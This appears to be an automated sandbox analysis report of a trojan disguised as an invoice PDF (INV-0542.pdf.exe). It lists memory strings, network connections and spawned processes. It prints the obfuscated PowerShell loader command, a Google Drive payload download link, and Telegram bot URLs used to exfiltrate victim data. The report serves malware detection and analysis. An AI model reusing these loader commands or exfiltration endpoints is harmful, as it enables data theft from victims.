          Source: powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000002.00000002.2413511774.00000000047D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000002.00000002.2413511774.00000000047D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
          Source: powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20a
          Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021A50000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021A41000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBjq
          Source: powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/$E
          Source: msiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/lBW
          Source: msiexec.exe, 00000005.00000002.3301201948.0000000020E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_
          Source: msiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_6_
          Source: msiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_f
          Source: msiexec.exe, 00000005.00000002.3286405273.0000000000779000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2540711816.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: msiexec.exe, 00000005.00000002.3286405273.0000000000779000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2540711816.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/U
          Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3286405273.0000000000767000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3286405273.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_&export=download
          Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 00000005.00000002.3302092440.000000002194E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.00000000218DE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 00000005.00000002.3302092440.00000000218DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021909000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.000000002194E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
          Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
          Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
          Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021A81000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: msiexec.exe, 00000005.00000002.3302092440.0000000021A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBjq
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49764 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49870 version: TLS 1.2
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeCode function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405705

          System Summary

          barindex
          Source: initial sampleStatic PE information: Filename: INV-0542.pdf.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeFile created: C:\Windows\resources\0809Jump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeFile created: C:\Windows\huzzah.lnkJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeCode function: 0_2_00406C5F0_2_00406C5F
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_072BC4962_2_072BC496
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0039E9885_2_0039E988
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003953705_2_00395370
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003971185_2_00397118
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003929EC5_2_003929EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00399E815_2_00399E81
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE5FD85_2_23EE5FD8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE66785_2_23EE6678
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE3FE85_2_23EE3FE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEF5E85_2_23EEF5E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE1FE85_2_23EE1FE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE0DE05_2_23EE0DE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE87E05_2_23EE87E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE6FFA5_2_23EE6FFA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE1FF85_2_23EE1FF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE0DF05_2_23EE0DF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE87F05_2_23EE87F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEDDF05_2_23EEDDF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE9FCC5_2_23EE9FCC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE5FC75_2_23EE5FC7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEB7C05_2_23EEB7C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE9FD85_2_23EE9FD8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE3FD85_2_23EE3FD8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEF5D75_2_23EEF5D7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEB7AF5_2_23EEB7AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE2DA85_2_23EE2DA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EECFA85_2_23EECFA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EECFA75_2_23EECFA7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE1BA05_2_23EE1BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE79885_2_23EE7988
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE4D895_2_23EE4D89
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE91805_2_23EE9180
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE2D9A5_2_23EE2D9A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE4D985_2_23EE4D98
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE79985_2_23EE7998
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEE7905_2_23EEE790
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE1B915_2_23EE1B91
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEA9685_2_23EEA968
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE09605_2_23EE0960
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEE77F5_2_23EEE77F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE91715_2_23EE9171
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE5B485_2_23EE5B48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE3B495_2_23EE3B49
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEC1425_2_23EEC142
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE6B405_2_23EE6B40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE3B585_2_23EE3B58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEA9585_2_23EEA958
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEC1505_2_23EEC150
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE09505_2_23EE0950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE83285_2_23EE8328
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EED9275_2_23EED927
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEF1205_2_23EEF120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EED9385_2_23EED938
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE5B395_2_23EE5B39
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE6B305_2_23EE6B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE290A5_2_23EE290A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE49085_2_23EE4908
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE29185_2_23EE2918
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE83185_2_23EE8318
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE17105_2_23EE1710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE9B105_2_23EE9B10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEF1115_2_23EEF111
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEB2E85_2_23EEB2E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EECAE05_2_23EECAE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE16FF5_2_23EE16FF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE9AFF5_2_23EE9AFF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEB2F85_2_23EEB2F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE48F75_2_23EE48F7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE36C85_2_23EE36C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEE2C85_2_23EEE2C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE04C05_2_23EE04C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE04D05_2_23EE04D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE74D05_2_23EE74D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EECAD15_2_23EECAD1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE56A85_2_23EE56A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE8CA95_2_23EE8CA9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEA4A05_2_23EEA4A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEFAA05_2_23EEFAA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE36BE5_2_23EE36BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE74BF5_2_23EE74BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE56B85_2_23EE56B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE8CB85_2_23EE8CB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEE2B85_2_23EEE2B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEFAB05_2_23EEFAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEA48F5_2_23EEA48F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE24885_2_23EE2488
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEBC885_2_23EEBC88
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE12805_2_23EE1280
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE44685_2_23EE4468
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE66685_2_23EE6668
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE7E605_2_23EE7E60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EED4605_2_23EED460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE44785_2_23EE4478
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE24785_2_23EE2478
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEBC785_2_23EEBC78
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EED4705_2_23EED470
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE12705_2_23EE1270
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE96485_2_23EE9648
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEEC495_2_23EEEC49
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE00405_2_23EE0040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEEC585_2_23EEEC58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE7E505_2_23EE7E50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE322E5_2_23EE322E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE52285_2_23EE5228
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE32385_2_23EE3238
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE96375_2_23EE9637
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEAE305_2_23EEAE30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE00315_2_23EE0031
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE70085_2_23EE7008
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEC6085_2_23EEC608
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEDE005_2_23EEDE00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEAE1F5_2_23EEAE1F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EE521C5_2_23EE521C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_23EEC6185_2_23EEC618
          Source: INV-0542.pdf.exeStatic PE information: invalid certificate
          Source: INV-0542.pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/16@5/5
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeCode function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049B1
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeFile created: C:\Users\user\AppData\Roaming\interpellantJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsf8E9F.tmpJump to behavior
          Source: INV-0542.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeFile read: C:\Users\user\Desktop\INV-0542.pdf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\INV-0542.pdf.exe "C:\Users\user\Desktop\INV-0542.pdf.exe"
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
